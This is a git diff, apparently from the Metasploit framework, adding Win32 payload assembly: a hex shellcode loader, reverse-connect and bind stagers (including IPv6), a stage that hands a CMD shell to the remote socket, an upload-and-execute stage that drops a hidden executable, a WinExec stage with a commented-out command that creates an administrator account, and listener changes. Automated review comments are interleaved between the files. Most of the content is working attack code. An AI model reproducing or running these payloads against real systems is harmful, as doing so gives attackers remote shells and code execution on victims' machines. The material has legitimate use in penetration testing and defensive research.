+"\x54\xff\x37\xff\x55\x28\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50" +"\xff\x55\x24\x89\xc7\x68\x7f\x00\x00\x01\x68\x02\x00\x22\x11\x89" +"\xe1\x6a\x10\x51\x57\xff\x55\x20\x59\x59\x6a\x40\x68\x00\x10\x00" +"\x00\x68\x00\x00\x10\x00\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x68" +"\x00\x10\x00\x00\x53\x57\xff\x55\x18\xff\xd3"; + + +int main(int argc, char **argv) +{ + int (*funct)(); + funct = (int (*)()) code; + (int)(*funct)(); +} diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.elf b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.elf new file mode 100755 index 0000000000..ed4b42c5ae Binary files /dev/null and b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.elf differ 
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.exe b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.exe
new file mode 100644
index 0000000000..1b5d0fff81
Binary files /dev/null and b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.exe differ
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_shell.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_shell.asm
new file mode 100644
index 0000000000..6c431cfa97
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_shell.asm
@@ -0,0 +1,10 @@
+; Title: Win32 Network Shell
+; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+; Author: hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+%include "win32_stage_boot_reverse.asm"
+%include "win32_stage_shell.asm"
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_shell_revert.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_shell_revert.asm
new file mode 100644
index 0000000000..54547cc9b4
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_shell_revert.asm
@@ -0,0 +1,11 @@
+; Title: Win32 Network Shell
+; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+; Author: hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+%include "win32_stage_boot_reverse.asm"
+%include "win32_stage_revert.asm"
+%include "win32_stage_shell.asm"
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_udp.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_udp.asm
new file mode 100644
index 0000000000..b71b549caf
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_udp.asm
@@ -0,0 +1,39 @@
+; Title: Win32 Reverse UDP "Connect" Payload
+; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+; Author: hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+%include "win32_stage_boot_winsock_conn_udp.asm"
+
+; [ebp + 0] = kernel32.dll base
+; [ebp + 4] = LGetProcAddress
+; [ebp + 8] = LoadLibraryA
+; [ebp + 12] = VirualAlloc
+; [ebp + 24] = recv
+; [ebp + 28] = send
+; [ebp + 32] = accept
+; [ebp + 36] = bind
+; [ebp + 40] = connect
+; [ebp + 44] = WSASocketA
+; [ebp + 48] = WSAStartup
+; [ebp + 52] = Payload Length
+
+LConnect:
+ ;push 0xf401a8c0 ; 192.168.1.244
+ ;push 0xbc32a8c0 ; 192.168.50.187
+ push 0x0100007f; host: 127.0.0.1
+ push 0x11220002 ; port: 8721
+ mov ecx, esp
+ push byte 0x10
+ push ecx
+ push dword edi
+ call dword FN_CONNECT
+ pop ecx ; remove port
+ pop ecx ; remove host
+
+ ; reconnect on failure
+ ; test eax, eax
+ ; jne short LConnect
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_winsock_bind.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_winsock_bind.asm
new file mode 100644
index 0000000000..b13c5d5744
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_boot_winsock_bind.asm
@@ -0,0 +1,77 @@
+; Title: Win32 Socket Initialization
+; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+; Author: hdm[at]metasploit.com
+
+
+[BITS 32]
+
+%include "win32_stage_api.asm"
+
+sub esp, 0x100
+push eax ; [ebp + 12] = VirtualAlloc
+push edi ; [ebp + 8] = LoadLibraryA
+push esi ; [ebp + 4] = LGetProcAddress
+push ebx ; [ebp + 0] = kernel32.dll base
+
+mov ebp, esp
+call LLoadWinsock
+
+%define FN_RECV [ebp + 24]
+%define FN_SEND [ebp + 28]
+%define FN_ACCEPT [ebp + 32]
+%define FN_BIND [ebp + 36]
+%define FN_LISTEN [ebp + 40]
+%define FN_WSASOCK [ebp + 44]
+%define FN_WSASTART [ebp + 48]
+
+LWSDataSegment:
+;========================
+dd 0x190 ; used by wsastartup
+dd 0xe71819b6 ; recv [ebp + 24]
+dd 0xe97019a4 ; send [ebp + 28]
+dd 0x498649e5 ; accept [ebp + 32]
+dd 0xc7701aa4 ; bind [ebp + 36]
+dd 0xe92eada4 ; listen [ebp + 40]
+dd 0xadf509d9 ; WSASocketA [ebp + 44]
+dd 0x3bfcedcb ; WSAStartup [ebp + 48]
+db "WS2_32", 0x00
+;========================
+
+LLoadWinsock:
+ pop ebx ; save address to data in ebx
+ lea ecx, [ebx + 32] ; find address of "WS2_32.DLL"
+ push ecx ; push address of "WS2_32.DLL"
+ call edi ; call LoadLibraryA("WS2_32.DLL")
+ mov edi, ebx ; store base of data section in edi
+ mov ebx, eax ; store base of winsock in ebx
+ lea esi, [ebp + 20] ; store base of function table
+ push byte 0x07 ; load five functions by hash
+ pop ecx ; configure the counter
+
+Looper:
+ push ecx ; save the counter
+ push ebx ; dll handle
+ push dword [edi + ecx * 4] ; function hash value
+ call [ebp + 4] ; find the address
+ pop ecx ; restore the counter
+ mov [esi + ecx * 4], eax ; stack segment to store addresses
+ loop Looper
+
+LWSAStartup: ; WSAStartup (0x101, DATA)
+ sub esp, [edi]
+ push esp
+ push dword [edi]
+ call FN_WSASTART
+ xor eax, eax
+
+LWSASocketA: ; WSASocketA (2,1,0,0,0,0)
+ push eax
+ push eax
+ push eax
+ push eax
+ inc eax
+ push eax
+ inc eax
+ push eax
+ call FN_WSASOCK
+ mov edi, eax
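Review bot: `push byte 0x07 ; load five functions by hash` pushes seven, matching the seven hashes in LWSDataSegment; the comment was evidently carried over from the connect variant, so `; load seven functions by hash` is the fix. The `LWSAStartup: ; WSAStartup (0x101, DATA)` comment also disagrees with the code, which passes `dword [edi]`, i.e. the 0x190 that heads the data segment, both as the version argument and as the size of the stack buffer; the same comment is in win32_stage_boot_winsock_conn.asm and win32_stage_boot_winsock_conn_udp.asm. `lea ecx, [ebx + 32]` lands on the `"WS2_32"` string only because exactly eight dwords precede it, which deserves a comment, and that string is `WS2_32`, not the `WS2_32.DLL` the next three comments name.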
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_winsock_conn.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_winsock_conn.asm
new file mode 100644
index 0000000000..db9dd86538
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_boot_winsock_conn.asm
@@ -0,0 +1,74 @@
+; Title: Win32 Socket Initialization (connect)
+; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+; Author: hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+%include "win32_stage_api.asm"
+
+sub esp, 0x100
+push eax ; [ebp + 12] = VirtualAlloc
+push edi ; [ebp + 8] = LoadLibraryA
+push esi ; [ebp + 4] = LGetProcAddress
+push ebx ; [ebp + 0] = kernel32.dll base
+
+mov ebp, esp
+call LLoadWinsock
+
+%define FN_RECV [ebp + 24]
+%define FN_SEND [ebp + 28]
+%define FN_CONNECT [ebp + 32]
+%define FN_WSASOCK [ebp + 36]
+%define FN_WSASTART [ebp + 40]
+
+LWSDataSegment:
+;========================
+dd 0x190 ; used by wsastartup
+dd 0xe71819b6 ; recv [ebp + 24]
+dd 0xe97019a4 ; send [ebp + 28]
+dd 0x60aaf9ec ; connect [ebp + 32]
+dd 0xadf509d9 ; WSASocketA [ebp + 36]
+dd 0x3bfcedcb ; WSAStartup [ebp + 40]
+db "WS2_32", 0x00
+;========================
+
+LLoadWinsock:
+ pop ebx ; save address to data in ebx
+ lea ecx, [ebx + 24] ; find address of "WS2_32.DLL"
+ push ecx ; push address of "WS2_32.DLL"
+ call edi ; call LoadLibraryA("WS2_32.DLL")
+ mov edi, ebx ; store base of data section in edi
+ mov ebx, eax ; store base of winsock in ebx
+ lea esi, [ebp + 20] ; store base of function table
+ push byte 0x05 ; load five functions by hash
+ pop ecx ; configure the counter
+
+Looper:
+ push ecx ; save the counter
+ push ebx ; dll handle
+ push dword [edi + ecx * 4] ; function hash value
+ call [ebp + 4] ; find the address
+ pop ecx ; restore the counter
+ mov [esi + ecx * 4], eax ; stack segment to store addresses
+ loop Looper
+
+LWSAStartup: ; WSAStartup (0x101, DATA)
+ sub esp, [edi]
+ push esp
+ push dword [edi]
+ call FN_WSASTART
+ xor eax, eax
+
+LWSASocketA: ; WSASocketA (2,1,0,0,0,0)
+ push eax
+ push eax
+ push eax
+ push eax
+ inc eax
+ push eax
+ inc eax
+ push eax
+ call FN_WSASOCK
+ mov edi, eax
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_winsock_conn_udp.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_winsock_conn_udp.asm
new file mode 100644
index 0000000000..1832017fb4
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_boot_winsock_conn_udp.asm
@@ -0,0 +1,74 @@ +; Title: Win32 Socket Initialization (connect) +; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 +; Author: hdm[at]metasploit.com + + + +[BITS 32] + +%include "win32_stage_api.asm" + +sub esp, 0x100 +push eax ; [ebp + 12] = VirtualAlloc +push edi ; [ebp + 8] = LoadLibraryA +push esi ; [ebp + 4] = LGetProcAddress +push ebx ; [ebp + 0] = kernel32.dll base + +mov ebp, esp +call LLoadWinsock + +%define FN_RECV [ebp + 24] +%define FN_SEND [ebp + 28] +%define FN_CONNECT [ebp + 32] +%define FN_WSASOCK [ebp + 36] +%define FN_WSASTART [ebp + 40] + +LWSDataSegment: +;======================== +dd 0x190 ; used by wsastartup +dd 0xe71819b6 ; recv [ebp + 24] +dd 0xe97019a4 ; send [ebp + 28] +dd 0x60aaf9ec ; connect [ebp + 32] +dd 0xadf509d9 ; WSASocketA [ebp + 36] +dd 0x3bfcedcb ; WSAStartup [ebp + 40] +db "WS2_32", 0x00 +;======================== + +LLoadWinsock: + pop ebx ; save address to data in ebx + lea ecx, [ebx + 24] ; find address of "WS2_32.DLL" + push ecx ; push address of "WS2_32.DLL" + call edi ; call LoadLibraryA("WS2_32.DLL") + mov edi, ebx ; store base of data section in edi + mov ebx, eax ; store base of winsock in ebx + lea esi, [ebp + 20] ; store base of function table + push byte 0x05 ; load five functions by hash + pop ecx ; configure the counter + +Looper: + push ecx ; save the counter + push ebx ; dll handle + push dword [edi + ecx * 4] ; function hash value + call [ebp + 4] ; find the address + pop ecx ; restore the counter + mov [esi + ecx * 4], eax ; stack segment to store addresses + loop Looper + +LWSAStartup: ; WSAStartup (0x101, DATA) + sub esp, [edi] + push esp + push dword [edi] + call FN_WSASTART + xor eax, eax + +LWSASocketA: ; WSASocketA (2,2,0,0,0,0) + push eax + push eax + push eax + push eax + inc eax + inc eax + push eax + push eax + call FN_WSASOCK + mov edi, eax 
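Review bot: The title comment is byte-identical to the TCP variant (`Win32 Socket Initialization (connect)`) although this file exists only to select SOCK_DGRAM, so the one line that distinguishes it is buried in the `LWSASocketA` pushes. Write `; Title: Win32 Socket Initialization (connect, UDP)` and expand the block comment to `; WSASocketA (AF_INET=2, SOCK_DGRAM=2, 0, 0, 0, 0)` so the second `inc eax` reads as intentional. The function table still includes `connect`, which is correct for a connected UDP socket but deserves `; connect() sets the default peer for send/recv` at the `FN_CONNECT` define.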
diff --git a/external/source/shellcode/windows/msf2/win32_stage_inlineegg.asm b/external/source/shellcode/windows/msf2/win32_stage_inlineegg.asm new file mode 100644 index 0000000000..c052dfae94 --- /dev/null +++ b/external/source/shellcode/windows/msf2/win32_stage_inlineegg.asm @@ -0,0 +1,32 @@ + +; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 +; Author: hdm[at]metasploit.com + + +[BITS 32] + +LFindGetProcAddress: + push dword [ebp] ; kernel32.dll + push 0x7c0dfcaa ; GetProcAddress + call [ebp + 4] + +LSend: ; send(s, data, len, flags); + push eax ; GetProcAddress + push dword [ebp + 8] ; LoadLibraryA + mov ecx, esp + push byte 0x00 ; flags + push byte 8 ; length + push ecx ; buffer + push edi ; socket + call FN_SEND ; send() + + +LRecvLength: ; recv(s, buff, 4, 0) + sub esp, 4096 + mov ebx, esp + push byte 0x00 ; flags + push 4096 ; length + push ebx ; buffer + push dword edi ; socket + call FN_RECV ; recv() + call ebx diff --git a/external/source/shellcode/windows/msf2/win32_stage_revert.asm b/external/source/shellcode/windows/msf2/win32_stage_revert.asm new file mode 100644 index 0000000000..1d6993515b --- /dev/null +++ b/external/source/shellcode/windows/msf2/win32_stage_revert.asm @@ -0,0 +1,19 @@ +; Title: Win32 RevertToSelf Stub +; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 +; Author: hdm[at]metasploit.com + + + +[BITS 32] + +call LLoadAdvapi + +LAVDataSegment: +db "ADVAPI32", 0x00 + +LLoadAdvapi + call [ebp + 8] ; call LoadLibraryA("ADVAPI32.DLL") + push eax ; Module base + push 0x50dec82a ; RevertToSelf + call [ebp + 4] ; Find address + call eax ; Call it diff --git a/external/source/shellcode/windows/msf2/win32_stage_shell.asm b/external/source/shellcode/windows/msf2/win32_stage_shell.asm new file mode 100644 index 0000000000..58d3113d2e --- /dev/null +++ b/external/source/shellcode/windows/msf2/win32_stage_shell.asm 
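Review bot: The `LRecvLength` comment `recv(s, buff, 4, 0)` does not match the code, which passes 4096 and receives one block into the stack buffer rather than a length word; the label name is equally stale, so `LRecvStage: ; recv(s, buff, 4096, 0)` fits what the block does. The result in eax is not examined before `call ebx`, so a 0 or SOCKET_ERROR return transfers control into uninitialised stack, which is a correctness gap rather than a deliberate choice as far as the file shows. The `LSend` block's eight-byte buffer layout (GetProcAddress then LoadLibraryA, lowest address first) also deserves a comment since the receiver depends on that order.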
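Review bot: `LLoadAdvapi` is written without a colon while every other label in these files has one; NASM accepts it but warns about an orphan label, so write `LLoadAdvapi:`. The `call LLoadAdvapi` over the `db "ADVAPI32", 0x00` relies on the return address being consumed as LoadLibraryA's lpLibFileName, which nothing states; add `; return address = &"ADVAPI32", passed straight to LoadLibraryA` at the label. The return value of the RevertToSelf call is discarded, which is fine for a stub but should be said in the trailing comment rather than `; Call it`.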
@@ -0,0 +1,78 @@ +; Title: Win32 Network Shell +; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 +; Author: hdm[at]metasploit.com + +[BITS 32] + + +; [ebp + 0] = kernel32.dll base +; [ebp + 4] = LGetProcAddress +; [ebp + 8] = LoadLibraryA +; edi = socket + +LSetCommand: + push "CMD" + mov ebx, esp + +LCreateProcessStructs: + xchg edi, edx ; save edi to edx + xor eax,eax ; overwrite with null + lea edi, [esp-84] ; struct sizes + push byte 21 ; 21 * 4 = 84 + pop ecx ; set counter + +LBZero: + rep stosd ; overwrite with null + xchg edi, edx ; restore edi + +LCreateStructs: + sub esp, 84 + mov byte [esp + 16], 68 ; si.cb = sizeof(si) + mov word [esp + 60], 0x0101 ; si.dwflags + + ; socket handles + mov [esp + 16 + 56], edi + mov [esp + 16 + 60], edi + mov [esp + 16 + 64], edi + + lea eax, [esp + 16] ; si + push esp ; pi + push eax + push ecx + push ecx + push ecx + + inc ecx + push ecx + dec ecx + + push ecx + push ecx + push ebx + push ecx + +LCreateProcessA: + push dword [ebp] ; kernel32.dll + push 0x16b3fe72 ; CreateProcessA + call [ebp + 4] + call eax + mov esi, esp + +LWaitForSingleObject: + push dword [ebp] ; kernel32.dll + push 0xce05d9ad ; WaitForSingleObject + call [ebp + 4] + mov ebx, eax + + push 0xFFFFFFFF + push dword [esi] + call ebx + +LDeathBecomesYou: + push dword [ebp] ; kernel32.dll + push 0x73e2d87e ; ExitProcess + call [ebp + 4] + + xor ebx, ebx + push ebx + call eax diff --git a/external/source/shellcode/windows/msf2/win32_stage_uploadexec.asm b/external/source/shellcode/windows/msf2/win32_stage_uploadexec.asm new file mode 100644 index 0000000000..7bc1e962a7 --- /dev/null +++ b/external/source/shellcode/windows/msf2/win32_stage_uploadexec.asm 
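Review bot: The CreateProcessA argument pushes at the end of `LCreateStructs` use `ecx` as the NULL arguments, which is only correct because `rep stosd` in `LBZero` exhausted ecx to zero; that invariant is unstated, and any ecx-using instruction inserted between the two blocks would silently pass garbage. Add `; ecx == 0 here: exhausted by rep stosd` before the first `push ecx`. The stack layout also needs a line: `[esp+0..15]` is PROCESS_INFORMATION and `[esp+16..83]` is STARTUPINFO, which is why `si.cb` is written at `esp+16` and the std handles at `esp+16+56/60/64`. The same block, with the same missing comments, is duplicated in win32_stage_uploadexec.asm in this commit.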
@@ -0,0 +1,174 @@ +; Title: Win32 Network Shell +; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 +; Author: hdm[at]metasploit.com + +[BITS 32] + +%ifndef FN_RECV + %define FN_RECV [ebp + 24] +%endif + +%define BLOCKSZ 32 + + +; [ebp + 0] = kernel32.dll base +; [ebp + 4] = LGetProcAddress +; [ebp + 8] = LoadLibraryA +; edi = socket + + +; ebx = handle of temp file +; esi = bytes left to read +; [ebp+100] = CreateFileA +; [ebp+104] = WriteFile +; [ebp+108] = CloseHandle +; [ebp+112] = file name +; [ebp+116] = recv buffer +; [ebp+120] = remaining bytes +; [ebp+124] = storage space + + +LLoadFileAPI: + push dword [ebp] + push 0x7c0017a5 ; CreateFileA + call [ebp + 4] + mov [ebp+100], eax + push dword [ebp] + push 0xe80a791f ; WriteFile + call [ebp + 4] + mov [ebp+104], eax + push dword [ebp] + push 0x0ffd97fb ; CloseHandle + call [ebp + 4] + mov [ebp+108], eax + +LReadFileLength: ; recv(s, buff, 4, 0) + lea eax, [ebp+120] + push byte 0x00 ; flags + push 4 ; length + push eax ; buffer + push dword edi ; socket + call FN_RECV ; recv() + mov eax, [ebp+120] ; remaining bytes + + call LGetFileName ; get ptr to file name + +; temporary file name +db "C:\metasploit.exe", 0x00 + +LGetFileName: + pop ecx + mov [ebp+112], ecx + +LCreateFile: + + push byte 0 ; template + push byte 6 ; FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM + push byte 4 ; OPEN_ALWAYS + push byte 0 ; lpSecurityAttributes=null + push byte 7 ; FILE_SHARE_DELETE | FILE_SHARE_READ | FILE_SHARE_WRITE; + push 0xe0000000 ; GENERIC_EXECUTE | GENERIC_READ | GENERIC_WRITE + push ecx ; file name + call [ebp+100] + mov ebx, eax ; Handle in ebx + +LConfigBuffer: + ; lea eax, [esp-BLOCKSZ-200] ; leave some room + sub esp, BLOCKSZ - 200 + +; shr eax, 2 +; shl eax, 2 + mov [ebp+116], esp ; store it away + +LReadSocket: ; recv(s, buff, 4096, 0) + mov eax, [ebp+116] ; recv buffer ptr + push byte 0x00 ; flags + push BLOCKSZ ; length + push eax ; buffer + push dword edi ; socket + call FN_RECV ; recv() + 
mov ecx, [ebp+120] ; remaining bytes + sub ecx, eax ; subtract recv + mov [ebp+120], ecx ; put it back + +LWriteFile: + push esp ; create storage + mov ecx, esp ; get storage space + push byte 0 ; not overlapped + push ecx ; &written + push eax ; recv len + push dword [ebp+116] ; source buffer + push ebx ; file handle + call [ebp+104] ; WriteFile + pop ecx ; remove storage + + mov eax, [ebp+120] ; remaining bytes + test eax, eax ; are we at zero? + jnz LReadSocket ; go read some more + +LCloseHandle: + push ebx + call [ebp+108] + +LCreateProcessStructs: + xchg edi, edx ; save edi to edx + xor eax,eax ; overwrite with null + lea edi, [esp-84] ; struct sizes + push byte 21 ; 21 * 4 = 84 + pop ecx ; set counter + +LBZero: + rep stosd ; overwrite with null + xchg edi, edx ; restore edi + +LCreateStructs: + sub esp, 84 + mov byte [esp + 16], 68 ; si.cb = sizeof(si) + mov word [esp + 60], 0x0101 ; si.dwflags + + ; socket handles + mov [esp + 16 + 56], edi + mov [esp + 16 + 60], edi + mov [esp + 16 + 64], edi + + lea eax, [esp + 16] ; si + push esp ; pi + push eax + push ecx + push ecx + push ecx + + inc ecx + push ecx + dec ecx + + push ecx + push ecx + push dword [ebp+112] + push ecx + +LCreateProcessA: + push dword [ebp] ; kernel32.dll + push 0x16b3fe72 ; CreateProcessA + call [ebp + 4] + call eax + mov esi, esp + +LWaitForSingleObject: + push dword [ebp] ; kernel32.dll + push 0xce05d9ad ; WaitForSingleObject + call [ebp + 4] + mov ebx, eax + + push 0xFFFFFFFF + push dword [esi] + call ebx + +LDeathBecomesYou: + push dword [ebp] ; kernel32.dll + push 0x73e2d87e ; ExitProcess + call [ebp + 4] + + xor ebx, ebx + push ebx + call eax diff --git a/external/source/shellcode/windows/msf2/win32_stage_winexec.asm b/external/source/shellcode/windows/msf2/win32_stage_winexec.asm new file mode 100644 index 0000000000..eeb4cc3364 --- /dev/null +++ b/external/source/shellcode/windows/msf2/win32_stage_winexec.asm 
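Review bot: `sub esp, BLOCKSZ - 200` in `LConfigBuffer` has a negative operand (32 - 200 = -168), so it moves esp up by 168 bytes instead of reserving space; the commented-out `lea` above it shows the intent was `sub esp, BLOCKSZ + 200`, and as written the receive buffer is placed over stack that earlier code may still be using. The title comment is copied from the shell stage (`Win32 Network Shell`) and the `LReadSocket` comment says 4096 where the code passes `BLOCKSZ`; write `; Title: Win32 Upload and Execute` and `; recv(s, buff, BLOCKSZ, 0)`. The `LReadSocket`/`LWriteFile` loop subtracts the recv result from `[ebp+120]` without checking for a 0 or SOCKET_ERROR return, so a closed connection leaves the counter non-zero (or wrapped) and the loop never exits.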
@@ -0,0 +1,34 @@ +; Title: Win32 Socket Initialization +; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 +; Author: hdm[at]metasploit.com + + +[BITS 32] + +%include "win32_stage_api.asm" + +jmp short GetCMD + +WinExec: + push ebx + push 0x0e8afe98 + call esi + call eax + + +ExitProcess: + push ebx + push 0x73e2d87e + call esi + push byte 0 + call eax + call eax + + +GetCMD: + push byte 0 ; last arg of WinExec + call WinExec + +; The command to execute +;db "cmd.exe /c net user X X /ADD && net localgroups Administrators X /ADD" +;db 0x00 diff --git a/external/source/shellcode/windows/stager_bind_ipv6_tcp_nx.asm b/external/source/shellcode/windows/stager_bind_ipv6_tcp_nx.asm new file mode 100644 index 0000000000..68d66bfc52 --- /dev/null +++ b/external/source/shellcode/windows/stager_bind_ipv6_tcp_nx.asm 
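Review bot: The title comment `Win32 Socket Initialization` is copied from another file; this stage resolves WinExec and ExitProcess and runs a command string appended after `GetCMD`, so `; Title: Win32 WinExec Stage` describes it. In the `ExitProcess` block the second `call eax` can only run if the first returns, which ExitProcess does not; either remove it or comment it as deliberate padding. This file also uses `esi`/`ebx` for GetProcAddress and the kernel32 base where the other stages use `[ebp+4]`/`[ebp]`, presumably the register contract left by `win32_stage_api.asm`; a header line such as `; esi = GetProcAddress, ebx = kernel32 base (from win32_stage_api.asm)` would make that explicit, and the `call WinExec` trick of using the return address as lpCmdLine deserves its own comment.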
@@ -0,0 +1,230 @@ +; Title: Windows Bind Stager (NX, IPv6) +; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 +; Author: Metasploit LLC + +[BITS 32] + +global _start +_start: + + call LKernel32Base + +LGetProcAddress: + push ebx + push ebp + push esi + push edi + mov ebp, [esp + 24] + mov eax, [ebp + 0x3c] + mov edx, [ebp + eax + 120] + add edx, ebp + mov ecx, [edx + 24] + mov ebx, [edx + 32] + add ebx, ebp + +LFnlp: + jecxz LNtfnd + dec ecx + mov esi, [ebx + ecx * 4] + add esi, ebp + xor edi, edi + cld + +LHshlp: + xor eax, eax + lodsb + cmp al, ah + je LFnd + ror edi, 13 + add edi, eax + jmp short LHshlp + +LFnd: + cmp edi, [esp + 20] + jnz LFnlp + mov ebx, [edx + 36] + add ebx, ebp + mov cx, [ebx + 2 * ecx] + mov ebx, [edx + 28] + add ebx, ebp + mov eax, [ebx + 4 * ecx] + add eax, ebp + jmp short LDone + +LNtfnd: + xor eax, eax + +LDone: + pop edi + pop esi + pop ebp + pop ebx + ret 8 + +LKernel32Base: + pop esi + push byte 0x30 + pop ecx + mov ebx, [fs:ecx] + mov ebx, [ebx + 0x0c] + mov ebx, [ebx + 0x1c] + mov ebx, [ebx] + mov ebx, [ebx + 0x08] + + push ebx ; kernel32.dll base + push dword 0xec0e4e8e ; LoadLibraryA + call esi ; GetProcAddress(kerne32.dll, LoadLibrary) + mov edi, eax + + push ebx ; kernel32.dll base + push dword 0x91afca54 ; VirtualAlloc + call esi ; GetProcAddress(kerne32.dll, VirtualAlloc) + + ; ebx = kernel32.dll base + ; esi = LGetProcAddress + ; edi = LoadLibraryA + ; eax = VirtualAlloc + +sub esp, 0x100 +push eax ; [ebp + 12] = VirtualAlloc +push edi ; [ebp + 8] = LoadLibraryA +push esi ; [ebp + 4] = LGetProcAddress +push ebx ; [ebp + 0] = kernel32.dll base + +mov ebp, esp +call LLoadWinsock + +%define FN_RECV [ebp + 24] +%define FN_SEND [ebp + 28] +%define FN_ACCEPT [ebp + 32] +%define FN_BIND [ebp + 36] +%define FN_LISTEN [ebp + 40] +%define FN_WSASOCK [ebp + 44] +%define FN_WSASTART [ebp + 48] + +LWSDataSegment: +;======================== +dd 0x190 ; used by wsastartup +dd 0xe71819b6 ; recv [ebp + 24] +dd 0xe97019a4 ; 
send [ebp + 28] +dd 0x498649e5 ; accept [ebp + 32] +dd 0xc7701aa4 ; bind [ebp + 36] +dd 0xe92eada4 ; listen [ebp + 40] +dd 0xadf509d9 ; WSASocketA [ebp + 44] +dd 0x3bfcedcb ; WSAStartup [ebp + 48] +db "WS2_32", 0x00 +;======================== + +LLoadWinsock: + pop ebx ; save address to data in ebx + lea ecx, [ebx + 32] ; find address of "WS2_32.DLL" + push ecx ; push address of "WS2_32.DLL" + call edi ; call LoadLibraryA("WS2_32.DLL") + mov edi, ebx ; store base of data section in edi + mov ebx, eax ; store base of winsock in ebx + lea esi, [ebp + 20] ; store base of function table + push byte 0x07 ; load five functions by hash + pop ecx ; configure the counter + +Looper: + push ecx ; save the counter + push ebx ; dll handle + push dword [edi + ecx * 4] ; function hash value + call [ebp + 4] ; find the address + pop ecx ; restore the counter + mov [esi + ecx * 4], eax ; stack segment to store addresses + loop Looper + +LWSAStartup: ; WSAStartup (0x0202, DATA) + sub esp, [edi] + push esp + push dword 0x0202 + call FN_WSASTART + xor eax, eax + +LWSASocketA: ; WSASocketA (23,1,6,0,0,0) + ; dwFlags + push eax + + ; RESERVED + push eax + + ; PROTOCOL INFO + push eax + + ; PROTOCOL: IPPROTO_TCP + push byte 6 + + ; TYPE: SOCK_STREAM + push byte 1 + + ; FAMILY: AF_INET6 + push byte 23 + + ; WSASocket() + call FN_WSASOCK + mov edi, eax + +LBind: + + ; sin6_scope_id + push dword 0x00000000 + xor ecx, ecx + + ; sin6_addr = ::0 + push ecx + push ecx + push ecx + push ecx + + ; sin6_flowinfo + push ecx + + ; sin6_port / sin6_family + push dword 0xffff0017 + + mov ecx, esp + + push byte 28 ; length + push ecx + push edi + call FN_BIND + + xor ebx, ebx + +LListen: + push ebx + push edi + call FN_LISTEN + +LAccept: + push ebx + push ebx + push edi + call FN_ACCEPT + mov edi, eax + +LAllocateMemory: ; VirtualAlloc(NULL,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE) + + push byte 0x40 + pop esi + push esi ; PAGE_EXECUTE_READWRITE=0x40 + + shl esi, 6 ; MEM_COMMIT=0x1000 + push esi + + shl 
esi, 8 ; 1MB + push esi + + push byte 0x00 ; NULL + call [ebp+12] + mov ebx, eax + + +LRecvLength: ; recv(s, buff, 4, 0) + push byte 0x00 ; flags + push dword 4096 ; length + push ebx ; buffer + push dword edi ; socket + call FN_RECV ; recv() + call ebx diff --git a/lib/msf/core/handler/reverse_tcp.rb b/lib/msf/core/handler/reverse_tcp.rb index 5db4bdd9a9..5b08379418 100644 --- a/lib/msf/core/handler/reverse_tcp.rb +++ b/lib/msf/core/handler/reverse_tcp.rb @@ -57,8 +57,12 @@ module ReverseTcp raise 'tcp connectback can not be used with proxies' end + # Switch to IPv6 ANY address if the LHOST is also IPv6 + addr = Rex::Socket.resolv_nbo(datastore['LHOST']) + lsnr = (addr.length == 4) ? "0.0.0.0" : "::0" + self.listener_sock = Rex::Socket::TcpServer.create( - # 'LocalHost' => datastore['LHOST'], + 'LocalHost' => lsnr, 'LocalPort' => datastore['LPORT'].to_i, 'Comm' => comm, 'Context' => diff --git a/lib/msf/core/payload.rb b/lib/msf/core/payload.rb index ced3a0ebfd..b87273cb53 100644 --- a/lib/msf/core/payload.rb +++ b/lib/msf/core/payload.rb @@ -267,9 +267,10 @@ class Payload < Msf::Module # # Supprted packing types: # - # - ADDR (foo.com, 1.2.3.4) - # - HEX (0x12345678, "\x41\x42\x43\x44") - # - RAW (raw bytes) + # - ADDR (foo.com, 1.2.3.4) + # - ADDR6 (foo.com, fe80::1234:5678:8910:1234) + # - HEX (0x12345678, "\x41\x42\x43\x44") + # - RAW (raw bytes) # def substitute_vars(raw, offsets) offsets.each_pair { |name, info| @@ -282,6 +283,19 @@ class Payload < 